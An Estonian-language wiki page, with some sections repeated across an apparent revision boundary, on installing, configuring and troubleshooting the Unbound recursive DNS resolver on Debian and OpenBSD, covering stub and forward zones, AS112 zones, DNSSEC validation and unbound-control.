* stub-addr - domeeni pädeva nimeserveri ip aadress
* stub sõna viitab asjaolule, et Unbound saab näidatud nimeserverilt otse vastuse kätte

Kui stub-zone abil on vaja teha mõne privaatsete aadressidega /24 subneti jaoks pöördteisendusi, siis tuleb tõenäoliselt kasutada koostöös selliseid direktiive

..
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

local-zone: "1.168.192.in-addr.arpa." transparent
local-zone: "2.168.192.in-addr.arpa." transparent
....

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

stub-zone:
name: "10.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

Oluline on panna tähele, et korrektsel juhul lahendatakse kirjeldatud tsoonid stub-addr nimeserveri poolt, muud privaatsed aadressid saavad vastuseks (vastuse genereerib Unbound ise)

$ dig -x 192.168.5.5
..
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1480
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800

Kui vastus on, siis midagi on valesti, sest Unbound on seda käinud internetis lahendamas

..
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 86400 IN SOA prisoner.iana.org. hostmaster.trex.fi. 1 604800 86400 2419200 86400

===Forward tsoon===

Forward tsooni abil saab öelda, millist rekursiivset nimeserverit kasutada mõne domeeni nimelahenduseks. Seadistusfailis kirjeldatakse forward tsoon selliselt

forward-zone:
name: "loomla.tartu.ee"
forward-addr: 10.172.20.10

kus

* name - domeeninimi
* forward-addr - rekursiivse nimeserveri aadress

Selleks, et suunata kõik päringud lahendamiseks edasi sobib kasutada

forward-zone:
name: "."
forward-addr: 10.172.20.10

===AS112 tsoonid===

AS112 tsoonide hulka kuuluvad sellised pöördteisenduse tsoonid, vaikimisi vastab AS112 tsooni tehtud päringutele Unbound NXDOMAIN (põhjusel, et sisemiste arvutite poolt tehtud pöördteisenduspäringud ei jõuaks avalikku võrku)

* 10.in-addr.arpa
* 16.172.in-addr.arpa
* ...
* 31.172.in-addr.arpa
* 168.192.in-addr.arpa
* 254.169.in-addr.arpa
* 2.0.192.in-addr.arpa
* 100.51.198.in-addr.arpa
* 113.0.203.in-addr.arpa

Lisaks lahendab Unbound vaikimisi mõlemas suunas localhost - 127.0.0.1 teisendust justkui oleks kirjeldatud (sarnaselt on kirjeldatud ka IPv6 ::1)

local-zone: "localhost." static
local-data: "localhost. 10800 IN NS localhost."
local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "localhost. 10800 IN A 127.0.0.1"
local-data: "localhost. 10800 IN AAAA ::1
..

local-zone: "127.in-addr.arpa." static
local-data: "127.in-addr.arpa. 10800 IN NS localhost."
local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

Selleks, et asutuse lokaalses autoriteetses nimeserveris kirjeldatud privaatsete aadresside pöördteisendused töötaksid tuleb kirjeldada vastava tsooni jaoks local-zone väärtusega nodefault

server:
...
local-zone: "168.192.in-addr.arpa." nodefault

ning nt 192.168.1 võrgu puhul näidata pädeva nimeserveri aadress

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.251

===Jõudlus===

* Unbound oskab kasutada mitut protsessorit ja nö keskpärasel riistvaral suudab teenidada kümneid tuhandeid päringuid sekundis.
* Unbound on 2-3 korda kiirem kui Bind.

===Klientprogrammi unbound-host kasutamine===

Klientprogramm unbound-host võimaldab nt kontrollida, kas nimelahenduse valideerimine töötab

# unbound-host -C unbound.conf -t A -v www.kaminskybug.se
[1264938168] libunbound[2566:0] notice: init module 0: validator
[1264938168] libunbound[2566:0] notice: init module 1: iterator
www.kaminskybug.se is an alias for fou.iis.se. (secure)
fou.iis.se has address 212.247.204.242 (secure)

===Haldusprogramm unbound-control===

Haldusprogrammiga unbound-control saab juhtida Unbound resolveri tööd ja küsida statistikat. Kuna unbound-control võimaldab resolveri töötamist oluliselt mõjutada, nt laadida cache sisu tekstifailist või resolveri seisata, siis peab hoolega jälgima, et unbound-control kasutamisele oleks seatud vajalikud piirangud.

====Unbound resolveri ettevalmistamine====

unbound-control suhtleb Unbound serveriga vaikimisi üle 953/tcp pordi. Osaliste autentimiseks kasutatakse avaliku-võtme tehnikat, vajalike võtmete genereerimiseks sobib kasutada unbound-control-setup utiliiti

# unbound-control-setup
...
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use

Tulemusena tekivad /var/unbound/etc kataloogi neli võtit, kask serveri ja kaks kliendi jaoks

unbound_control.key
unbound_control.pem
unbound_server.key
unbound_server.pem

unbound-control kasutamiseks tuleb vastav funktsionaalsus Unbound serveris sisse lülitada nt sektsiooniga

remote-control:
control-enable: yes
control-interface: 127.0.0.1

====unbound-control kasutamine====

Vaikimisi kasutab unbound-control Unbound serveri seadistusfaili, nt sobib alustuseks kasutada unbound serverit ja unbound-control utiliiti samas arvutis.

* Unbound resolveri oleku küsimine

# unbound-control status
version: 1.3.0
verbosity: 1
threads: 1
modules: 2 [ validator iterator ]
uptime: 1184 seconds
unbound (pid 23298) is running...

* Resolveri cacheist tsooni loomaaed.tartu.ee andmete kustutamine

# unbound-control flush_zone loomaaed.tartu.ee
ok removed 3 rrsets, 2 messages and 0 key entries

* Cache sisu esitamine

# unbound-control dump_cache

====Resolveri kasutusstatistika====

Üks unbound-control kasutusjuht on koguda resolveri kasutusstatistikat

# unbound-control stats_noreset

Praktiliselt on seda sobiv automatiseerida Munin või Cacti tarkvaraga, mida on kirjeldatud aadressil http://www.unbound.net/documentation/howto_statistics.html.

===Unbound ja NSD protsessid samas arvutis===

Unbound seadistusfailis sobib kasutada ridu

domain-insecure: "loomaaed.tartu.ee"
domain-insecure: "loomaaed.tartu.eu"
domain-insecure: "loomaaed.tartu.org"
...
stub-zone:
name: "loomaaed.tartu.ee"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.eu"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.org"
stub-addr: 10.193.0.53

===IPv6 kasutamine===

IPv6 kasutamiseks tuleb seadistusfailis näidata, millisel IPv6 aadressil protsess kuulab

interface: 2001:1530:90:11:192::53

ning lubada asjakohastest võrkudest teenuse poole pöörduda, nt

access-control: fd99::/64 allow

Lisaks tuleb arvestada seda, et nimepäringute lahendamiseks kasutab Unbound ise IPv4 ja IPv6 võrku.

===2026 kevad märkused===

====Tööpõhimõte====

Väited

* private-address ja private-domain kasutamine toimub koostöös
* private-domain loetleb domeenide nimed, mille alla kuuluvad kirjed võivad lahenduda privaatseteks aadressideks
* private-address määratleb, mida peetakse antud kasutusjuhtumil silmas privaatsete aadresside all
* üks unbound protssess saab tegeleda ainult ühe komplekti domeenide ja ühe komplekti privaatsete aadressidega
* vaikimisi ei lahenda unbound as112 hulka kuuluvate dns nimesid (nt 4.3.2.10.in-addr.arpa ptr kirje küsimust)
* local-zone abil saab teha erandeid mainitud as112 nimede lahenduses

local-zone erandi tegemine 168.192.in-addr.arpa jaoks

<pre>
..

local-zone: "168.192.in-addr.arpa" transparent

stub-zone:
name: "168.192.in-addr.arpa"
stub-addr: 10.192.0.53

...
</pre>

====Misc====

Takerdub

<pre>
# apt-get install unbound
root@arv:~# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound-anchor
The following NEW packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound unbound-anchor
0 upgraded, 5 newly installed, 0 to remove and 49 not upgraded.
...

Setting up unbound (1.6.7-1ubuntu2.6+esm4) ...
Created symlink /etc/systemd/system/multi-user.target.wants/unbound.service → /lib/systemd/system/unbound.service.
Created symlink /etc/systemd/system/unbound.service.wants/unbound-resolvconf.service → /lib/systemd/system/unbound-resolvconf.service.
Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.

Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.
invoke-rc.d: initscript unbound, action "start" failed.
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (auto-restart) (Result: exit-code) since Tue 2026-06-16 11:21:17 EEST; 9ms ago
Docs: man:unbound(8)
Process: 5650 ExecStart=/usr/sbin/unbound -d $DAEMON_OPTS (code=exited, status=1/FAILURE)
Process: 5304 ExecStartPre=/usr/lib/unbound/package-helper root_trust_anchor_update (code=exited, status=0/SUCCESS)
Process: 5301 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Main PID: 5650 (code=exited, status=1/FAILURE)
Processing triggers for libc-bin (2.27-3ubuntu1.6+esm6) ...
Processing triggers for systemd (237-3ubuntu10.57+esm3) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root 5304 0.0 0.0 4636 896 ? Ss 11:20 0:00 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
unbound 5307 0.0 0.0 34596 7820 ? S 11:20 0:00 \_ /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v
</pre>

ning

<pre>
root@arv:~# systemctl status unbound
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (start-pre) since Tue 2026-06-16 11:33:15 EEST; 38s ago
Docs: man:unbound(8)
Process: 12287 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Cntrl PID: 12290 (package-helper)
Tasks: 2 (limit: 4915)
CGroup: /system.slice/unbound.service
├─12290 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
└─12293 /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v

Jun 16 11:33:15 arv.auul.pri.ee systemd[1]: Starting Unbound DNS server...
</pre>

lahenduse koht

<pre>
root@arv:~# head -n 10 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.

root@arv:~# head -n 20 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.
RESOLVCONF="true"
ROOT_TRUST_ANCHOR_UPDATE="true"

if [ -f /etc/default/unbound ]; then
. /etc/default/unbound

case "x$RESOLVCONF" in xfalse|x0|xno)
RESOLVCONF="false"
;;
esac
</pre>

t

<pre>
server:
interface: 127.0.0.1
port: 53
do-ip4: yes
do-ip6: no

access-control: 127.0.0.1/32 allow
module-config: "iterator"
verbosity: 1
use-syslog: yes
log-queries: yes

stub-zone:
name: "xxx.ee"
stub-addr: 192.168.1.111

forward-zone:
name: "."
forward-addr: 10.0.9.4
forward-addr: 10.0.9.5
</pre>

===Kasulikud lisamaterjalid===

* http://unbound.net/
* http://unbound.nlnetlabs.nl/pipermail/unbound-users/
* http://www.howtoforge.com/installing-using-unbound-nameserver-on-debian-etch
* http://www.nlnetlabs.nl/publications/dnssec_howto/index.html
* http://secspider.cs.ucla.edu/islands.html
* https://itar.iana.org/
* https://ns.iana.org/dnssec/status.html
* https://dlv.isc.org/
* http://en.wikipedia.org/wiki/AS112
* [[:Pädeva nimeserveri NSD kasutamine]]

Rekursiivse resolveri Unbound kasutamine operatsioonisüsteemiga Debian

2026-06-17T21:12:46Z

Imre: /* 2026 kevad märkused */

[[Kategooria:Interneti domeeninimede süsteem]]
===Sissejuhatus===

Üks võimalus liigitada nimeservereid või nimeserverite tarkvara on selle järgi, millised päringuid teenindatakse

* pädev ehk autoriteetne (ingl. k. authoritative) - vastab päringutele ainult nimeserveri tsoonifailis kirjeldatud andmete alusel; autoriteetsed nimeserverid teenindavad reeglina resolverite päringuid
* rekursiivne (ingl. k. recursive) - rekursiivne nimeserver ei sisalda nö oma tsoonifaili, st ta ei ole mingite vastuste osas autoriteetne; rekursiivne nimeserver teenindab mingi piiratud hulga klientide päringuid lahendades neid autoriteetsete nimeserverite abil ja seetõttu nimetatakse rekursiivset nimeserverit tihti resolveriks (ingl. k. to resolve - lahendama)

Unbound http://www.unbound.net/ resolveril on selliseid omadused

* rekursiivne - lahendab nö lõppkasutaja esitatud päringuid, nt sobib seadistada töökohaarvuti nimeserveriks
* vaheladustav (ingl. k. caching) - Unbound peab kord lahendatud vastust mõnda aega meeles, mis tähendab, et järgmisele samale päringule vastab ta kliendile kohe ja ei pea omakorda pöörduma vastuse saamiseks autoriteetsete nimeserverite poole
* valideeriv - toetab DNSSEC kasutamist
* IPv6 tugi

Rekursiivse resolveri vastutus on parimal võimalikul moel anda kliendi esitatud päringule vastus, seejuures

* kasutada vastuse koostamisel mitmete pädevate nimeserverite abi
* anda õige vastus - nt mitte ennast lasta eksitada cache poisoning tehnikatest, võimalusel kasutada DNSSEC vahendeid
* vastata kiiresti

===Unbound paigaldamine===

2011 aastal leidub paljude operatsioonisüsteemide paketihalduses Unbound tarkvara.

====Debian====

Debian Squeeze sisaldab versiooni 1.4.6 ja paigaldamiseks sobib öelda

# apt-get install unbound

====OpenBSD====

OpenBSD 5.4 sisaldab binaarse paketina versiooni 1.4.9 ja paigaldamiseks sobib öelda

# pkg_add unbound
unbound-1.4.20:libldns-1.6.16p0: ok
useradd: Warning: home directory `/var/unbound' doesn't exist, and -m was not specified
unbound-1.4.20: ok
The following new rcscripts were installed: /etc/rc.d/unbound
See rc.d(8) for details.
--- +unbound-1.4.20 -------------------
You should add:

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

to /etc/rc.conf.local to create a syslog socket in the unbound chroot.

Selleks, et /etc/rc.d/unbound skript töötaks, peab olema seadistatud unbound-control (127.0.0.1 pealt).

===Unbound seadistamine===

Resolveri seadistusfailis tuleb näidata muu hulgas

* juurnimeserverite aadressid
* millisel aadressil resolver päringuid teenindab
* millised kliendid saavad resolverit kasutada, tavaliselt kliendi src ip aadressi täpsusega

Unbound tööd juhib seadistusfail unbound.conf

* /etc/unbound/unbound.conf - Debian
* /var/unbound/etc/unbound.conf - OpenBSD

Lihtsamal juhul võib kasutada nt sellise sisuga seadistusfaili

server:
interface: 192.168.10.190
outgoing-interface: 192.168.10.190
access-control: 192.168.1.0/24 allow
access-control: 192.168.10.0/24 allow_snoop
root-hints: "/var/unbound/etc/named.cache"

kus

* interface - millisel aadressil arvuti Unbound resolveri kliente teenindab
* outgoing-interface - milliselt aadressilt resolveri päringud autoriteetsetele nimeserveritele väljuvad
* access-control - millistelt ip aadressidelt saab Unbound resolverit kasutada; allow lubab esitada ainult rekursiivseid päringuid, nt +norec annab vaikimisi refused vastuse

$ dig +norec @nimeserver domeeni.nimi
...
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 52133

allow_snoop lubab mõlemaid (viimane on vajalik, et unbound kasutaja saaks öelda

$ dig +trace @nimeserver domeeni.nimi

* root-hints - resolver peab alati teadma interneti juurnimeserverite aadresse

Juurnimeserverite aadresse saab küsida mõnes juba seadistatud resolveriga arvutis

$ dig . ns

või kopeerida aadressilt Linuxis

$ wget ftp://FTP.INTERNIC.NET/domain/named.cache

OpenBSD keskkonnas

$ ftp ftp://FTP.INTERNIC.NET/domain/named.cache

===Unbound käivitamine===

Unbound resolver teenindab päringuid portidel 53/udp ja 53/tcp.

====Debian====

Käivitamiseks tuleb öelda

# /etc/init.d/unbound start | stop

====OpenBSD====

Selleks, et Unbound töötaks OpenBSD all chroot keskkonnas kataloogis /var/unbound kasutajana _unbound tuleb kasutada seadistusfailis rida

chroot: "/var/unbound"

Et chroot keskkonnas töötav Unbound saaks logida syslog'i tuleb syslog käivitamisel lisaks kasutada '-a /var/unbound/dev/log'

# syslogd -a /var/www/dev/log -a /var/empty/dev/log -a /var/unbound/dev/log

/etc/rc.conf.local failis sobib kasutada rida

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

2012 kevadel ütleb OpenBSD v. 5.1 paketihalduse unbound chroot kasutamisel kävitamisel nii

# unbound -dv
[1335943357] unbound[20534:0] notice: Start of unbound 1.4.15.
[1335943357] unbound[20534:0] warning: increased limit(open files) from 128 to 4140
[1335943357] unbound[20534:0] warning: unable to setusercontext _unbound: Bad file descriptor

Limiitide tuleb töötada sarnaselt nagu on kirjeldatud aadressil http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_OpenBSD_kasutamine#Login_class_kasutamine.

Tavalisel viisil sobib kasutada käivitusskripti

# /etc/rc.d/unbound start | stop

Vastasel korral on logis midagi sellist

Mar 13 16:03:01 unbound[28759:0] error: can't create socket: Too many open files

===Unbound kasutamine===

Unbound resolveri kasutajateks on tavaliselt arvutid, mis vajavad nimelahendust, nt kohtvõrgu arvutid, eposti serverid jt kusjuures Unbound protsess töötab selleks ettenähtud arvutis või võrgusõlmeks olevas seadmes

internet
...
|
_|_
| | OpenBSD võrgusõlm
|___| Unbound protsess
|
--|---|----------|-----------|--
| | |

dns kliendid (töökohaarvuti, serverid)

Linux keskkonnas sobib näidata nimeserveri aadress staatiliselt arvuti /etc/resolv.conf failis nt reaga

nameserver 192.168.10.190

Unbound resolveri tööd saab kontrollida nt öeldes mõnes arvutis, kus peab kõnealust resolverit saama kasutada

$ dig @192.168.10.190 kuutorvaja.eenet.ee a

ja vastus peaks sisaldama sarnaseid ridu rida

...
;; QUESTION SECTION:
;kuutorvaja.eenet.ee. IN A

;; ANSWER SECTION:
kuutorvaja.eenet.ee. 83840 IN A 193.40.0.7
..

===Nimepäringu vastuse valideerimine===

Nimepäringute vastuste valideerimiseks kasutatakse üldiselt DNSSEC tehnikat. 2011 aastal on selleks mitmeid võimalusi, kaks populaarsemat on

* signeeritud tsoonifailidega juurnimeserverite kasutamine, kõige loomulikum viis
* DLV (DNSSEC Look-aside Validation) - üleminekuaja häkk

Kui nimeteenust kasutatakse sarnaselt ülaltoodud skeemile, siis peab arvestama, et DNSSEC kontroll toimub Unbound protsessi juures, sealt edasi kliendini liigub vastus tavalise avateksina üle kohtvõrgu ja klient otsustab vastuse turvalisuse üle ad biti järgi vastuses. Seetõttu on reeglina soovitav, et Unbound töötaks nimeteenust kasutatavatele arvutitele võimalikult lähedal.

DNSSEC juurutamise kronoloogia

* 15. juuli 2010 - juurnimeserverid kasutavad signeeritud tsoone http://www.root-dnssec.org/
* ? - .org tsoon on signeeritud
* 31. märts 2011 - .com tsoon on signeeritud http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/

Kasulikud lisamaterjalid

* http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/
* http://blogs.pcmag.com/securitywatch/2011/03/dnssec_in_com_domain_is_a_good.php

====Signeeritud tsoonifailiga juurnimeserverite kasutamine====

Unbound seadistamiseks tuleb kasutada seadistusfailis rida

auto-trust-anchor-file: "root.key"

kusjuures fail peab olema unbound protsessile kirjutatav ning esialgselt sisaldama rida (as per http://unbound.net/documentation/howto_anchor.html)

# cat /var/unbound/etc/root.key
. IN DS 19036 8 2 49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5

# chown _unbound /var/unbound/etc
# chown _unbound:_unbound /var/unbound/etc/root.key

Peale unbound protsessi käivitamist selle faili sisu muutub automaatselt.

Kontrollimiseks sobib öelda

$ dig . ns +dnssec +multiline

; <<>> DiG 9.7.2-P3 <<>> . ns +dnssec +multiline
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4737
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 518267 IN NS m.root-servers.net.
. 518267 IN NS g.root-servers.net.
. 518267 IN NS b.root-servers.net.
. 518267 IN NS h.root-servers.net.
. 518267 IN NS a.root-servers.net.
. 518267 IN NS e.root-servers.net.
. 518267 IN NS k.root-servers.net.
. 518267 IN NS f.root-servers.net.
. 518267 IN NS c.root-servers.net.
. 518267 IN NS j.root-servers.net.
. 518267 IN NS i.root-servers.net.
. 518267 IN NS l.root-servers.net.
. 518267 IN NS d.root-servers.net.
. 518267 IN RRSIG NS 8 0 518400 20110409000000 (
20110401230000 34525 .
De4SFgTDwpgbz1JjTlaPzu7ZNRURLSnoYmQQQIZq7Gny
RghOrsvS1soH5F43Gxr5BIi+422EBLJIrEHFnbvLy22S
LqKtSw67eDdsBZyjE5fTtDHyYhnoR8YQWswgGVMRk4Ek
iDDMIOk5pF+CvbML6TlvTWrnPCwNWXnbLFnT9SY= )

;; Query time: 0 msec
;; SERVER: 10.192.0.53#53(10.192.0.53)
;; WHEN: Sat Apr 2 18:44:16 2011
;; MSG SIZE rcvd: 397

kus tuleb tähele panna

* vastus sisaldab RRSIG kirjet
* flags: qr rd ra ad - ad tähistab, et tegu on authoritative data sisaldusega

====DLV====

DLV seadistamiseks tuleb

* kopeerida trust anchor fail kataloogi /var/unbound/etc

# cd /var/unbound/etc
# ftp http://ftp.isc.org/www/dlv/dlv.isc.org.key

* Unbound seadistusfailis kasutada rida

dlv-anchor-file: "dlv.isc.org.key

Valideeritud nimepäringu vastus näeb välja nt selline

$ dig www.kaminskybug.se a +dnssec +multiline

; <<>> DiG 9.5.1-P3 <<>> www.kaminskybug.se a +dnssec +multiline
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56069
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.kaminskybug.se. IN A

;; ANSWER SECTION:
www.kaminskybug.se. 3590 IN CNAME fou.iis.se.
www.kaminskybug.se. 3590 IN RRSIG CNAME 5 3 3600 20100205210001 (
20100126210001 13358 kaminskybug.se.
goEav1vWK49WEvGY/G1EBKOgekQk11JvjsQxE7chH6Kg
OwZNpOXwomE1z9zvLcwkD60CQAZWC9psA1z01iIwtOrt
Yq6L+2A0PLVAAuRYeY3CQnbHoHRYClCUz0dIkxhtz9f/
Um1AuC3FtqV6t9q8lLb4ooav0Ex64KuwoPPxqqs= )
fou.iis.se. 3590 IN A 212.247.204.242
fou.iis.se. 3590 IN RRSIG A 5 3 3600 20100209131501 (
20100130131501 56315 iis.se.
BOPpSETDBKu6CjOcz2ULnOnfRVoXfOXj9OjW4zwjPuWl
7vJ8630yXsuSEe89RuH/ZsuOGbeJnumQ/XmD6ftWL9yM
MPUF1ZYxCtExaBcIxhxDIFJv4E4RZAOkbb9ZdYKTglIL
zDleOOms0iVgCAnnWJSnmDpzhfvr8xoTGlh7myE= )

;; AUTHORITY SECTION:
iis.se. 3590 IN NS ns.nic.se.
iis.se. 3590 IN NS ns3.nic.se.
iis.se. 3590 IN NS ns2.nic.se.
iis.se. 3590 IN RRSIG NS 5 2 3600 20100209131501 (
20100130131501 56315 iis.se.
B3SheLIv8ouVPpFGjvM8q5fl9ZMnnPWR8x9QDD0uSxoH
iV2fYHjiKC5a2+8Znsi4zSdO2AmH+reUCP74qvYpkl1K
+NbEzndzzrJQ0XlT1icy3MC6vdvgdE7Opqjab/7iIiYV
X9UjZpHKR284EljSrKJ0z53/T+12P3K0VU/dRFE= )

;; Query time: 1 msec
;; SERVER: 10.53.67.69#53(10.53.67.69)
;; WHEN: Sun Jan 31 00:25:39 2010
;; MSG SIZE rcvd: 648

kus ad lipp annab tunnistust, et vastus on valideeritud

flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

====Firefox DNSSEC lisa kasutamine====

Firefox DNSSEC lisa https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/ abil saab brauseri kasutamise ajal tagasisidet kuidas käesolev nimi on lahendatud, nt

[[Pilt:Unbound-1.gif]]

Seejuures tuleb arvestada, et DNSSEC iseenest tähendab, et nimi lahendes turvaliselt, järgneva andmevahetuse turvalisus on eraldi küsimus ja nt https:// on üks viis selle saavutamiseks.

===domain-insecure tsoonid===

Kui kasutatakse signeeritud tsoonifailiga juurnimeservereid ning mõnele lokaalsele mitte-dnssec nimeserverile viitavaid stub-zone sissekandeid, siis võib olla asjakohane kasutada lisaks ridu

domain-insecure: "auul"
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

===Lokaalsed nimekirjeldused===

Lisaks sellele, et Unboundi kasutab nimede lahendamisel võrgus töötavaid autoriteetseid nimeservereid, saab kirjeldada seadistusfailis päri- ja pöördteisendusi

local-zone: "loomaaed.tartu.ee" static
local-data: "loomaaed.tartu.ee A 192.168.10.100"
..
local-data-ptr: "192.168.10.100 loomaaed.tartu.ee"

kus

* local-zone - lokaalselt unboundis kirjeldatud tsooni nimi
* static - sellel positsioonil st type parameeter määrab põhiliselt, kuidas mitte kirjeldatud nime küsimisele vastatakse
* local-data - päriteisendus
* local-data-prt - pöördteisendus

type väärtused

* static - local-data abil mitte kirjeldatud nime küsimisele vastatakse NXDOMAIN
* nodefault - AS112 tsoonide puhul vastab Unbound vaikimisi NXDOMAIN vastusega, nodefault puhul püütakse vastavaid nimesid lahendada
* transparent - local-data abil mitte kirjeldatud nimi püütakse lahenada internetist, stub-zone abil vms viisil
* redirect - kõik alamdomeenid vastatakse local-data abil näidatud väärtusega

===Stub tsoon===

Stub tsooni abil saab öelda, millist pädevat nimeserverit kasutada mõne domeeni nimelahenduseks. Praktiliselt võiks seda vaja minna kui asutuses on nt kasutusel mitte-avalik pädev nimeserver ja domeeni 'auul.' nimede lahendamiseks tuleks kasutada seda; vastasel korral püüaks Unbound neid nimesid lahendada pöördudes interneti juurnimeserverite poole.

Seadistusfailis kirjeldatakse stub tsoon selliselt

stub-zone:
name: "auul"
stub-addr: 192.168.1.251

kus

* name - domeeni nimi
* stub-addr - domeeni pädeva nimeserveri ip aadress
* stub sõna viitab asjaolule, et Unbound saab näidatud nimeserverilt otse vastuse kätte

Kui stub-zone abil on vaja teha mõne privaatsete aadressidega /24 subneti jaoks pöördteisendusi, siis tuleb tõenäoliselt kasutada koostöös selliseid direktiive

..
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

local-zone: "1.168.192.in-addr.arpa." transparent
local-zone: "2.168.192.in-addr.arpa." transparent
....

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

stub-zone:
name: "10.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

Oluline on panna tähele, et korrektsel juhul lahendatakse kirjeldatud tsoonid stub-addr nimeserveri poolt, muud privaatsed aadressid saavad vastuseks (vastuse genereerib Unbound ise)

$ dig -x 192.168.5.5
..
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1480
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800

Kui vastus on, siis midagi on valesti, sest Unbound on seda käinud internetis lahendamas

..
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 86400 IN SOA prisoner.iana.org. hostmaster.trex.fi. 1 604800 86400 2419200 86400

===Forward tsoon===

Forward tsooni abil saab öelda, millist rekursiivset nimeserverit kasutada mõne domeeni nimelahenduseks. Seadistusfailis kirjeldatakse forward tsoon selliselt

forward-zone:
name: "loomla.tartu.ee"
forward-addr: 10.172.20.10

kus

* name - domeeninimi
* forward-addr - rekursiivse nimeserveri aadress

Selleks, et suunata kõik päringud lahendamiseks edasi sobib kasutada

forward-zone:
name: "."
forward-addr: 10.172.20.10

===AS112 tsoonid===

AS112 tsoonide hulka kuuluvad sellised pöördteisenduse tsoonid, vaikimisi vastab AS112 tsooni tehtud päringutele Unbound NXDOMAIN (põhjusel, et sisemiste arvutite poolt tehtud pöördteisenduspäringud ei jõuaks avalikku võrku)

* 10.in-addr.arpa
* 16.172.in-addr.arpa
* ...
* 31.172.in-addr.arpa
* 168.192.in-addr.arpa
* 254.169.in-addr.arpa
* 2.0.192.in-addr.arpa
* 100.51.198.in-addr.arpa
* 113.0.203.in-addr.arpa

Lisaks lahendab Unbound vaikimisi mõlemas suunas localhost - 127.0.0.1 teisendust justkui oleks kirjeldatud (sarnaselt on kirjeldatud ka IPv6 ::1)

local-zone: "localhost." static
local-data: "localhost. 10800 IN NS localhost."
local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "localhost. 10800 IN A 127.0.0.1"
local-data: "localhost. 10800 IN AAAA ::1
..

local-zone: "127.in-addr.arpa." static
local-data: "127.in-addr.arpa. 10800 IN NS localhost."
